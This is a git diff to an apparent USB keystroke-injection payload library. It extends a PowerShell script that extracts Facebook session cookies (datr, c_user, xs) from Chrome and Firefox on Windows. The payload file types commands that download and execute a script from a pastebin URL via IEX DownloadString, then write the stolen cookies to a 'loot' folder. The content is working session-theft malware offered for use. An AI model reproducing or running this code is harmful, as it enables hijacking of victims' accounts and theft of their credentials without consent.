diff --git a/payloads/library/WindowsCookies/README.md b/payloads/library/WindowsCookies/README.md index ed037be7..8714a9b2 100644 --- a/payloads/library/WindowsCookies/README.md +++ b/payloads/library/WindowsCookies/README.md @@ -6,8 +6,8 @@ Credit: illwill, sekirkity, EmpireProject ## Description -Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession -Only works for Chrome on Windows. Tested on two different Windows 10 machines. +Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession +Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines. Only payload.txt is required, powershell script is here only if you want to modify it. ## Payload LED STATUS diff --git a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 index 8233e8b6..c9214787 100644 --- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1 +++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1 @@ -4,7 +4,54 @@ # Use: Get-FacebookCreds [path to Login Data] # Path is optional, use if automatic search doesn't work -function Get-FacebookCreds() { +function Get-FacebookCreds-Firefox() { + Param( + [String]$Path + ) + + if ([String]::IsNullOrEmpty($Path)) { + # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies" + $path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite" + } + + if (![system.io.file]::Exists($Path)) + { + Write-Error 'Chrome db file doesnt exist, or invalid file path specified.' + Break + } + + Add-Type -AssemblyName System.Security + # Credit to Matt Graber for his technique on using regular expressions to search for binary data + $Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite' + $Encoding = [system.Text.Encoding]::GetEncoding(28591) + $StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding + $BinaryText = $StreamReader.ReadToEnd() + $StreamReader.Close() + $Stream.Close() + + # First the magic bytes for the facebook string, datr size is 24 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $datr = $PwdMatches.groups[1] + + "datr is $datr" + + # First the magic bytes for the facebook string, c_user size is 15 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $c_user = $PwdMatches.groups[1] + + "c_user is $c_user" + + # First the magic bytes for the facebook string, xs size is 44 + $PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})' + $PwdMatches = $PwdRegex.Matches($BinaryText) + $xs = $PwdMatches.groups[1] + + "xs is $xs" +} + +function Get-FacebookCreds-Chrome() { Param( [String]$Path ) @@ -61,5 +108,3 @@ function Get-FacebookCreds() { "xs is $DecPwd" } - -Get-FacebookCreds \ No newline at end of file diff --git a/payloads/library/WindowsCookies/payload.txt b/payloads/library/WindowsCookies/payload.txt index 0e0a7281..3a880a0b 100644 --- a/payloads/library/WindowsCookies/payload.txt +++ b/payloads/library/WindowsCookies/payload.txt @@ -37,7 +37,9 @@ Q ENTER Q DELAY 100 #Dump Chrome Creds -Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Chrome \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt +Q ENTER +Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/pastebin.com\/raw\/25Z8peMb\'\)\; Get-FacebookCreds-Firefox \| Out-File -Append \$Bunny\\loot\\FacebookSession\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit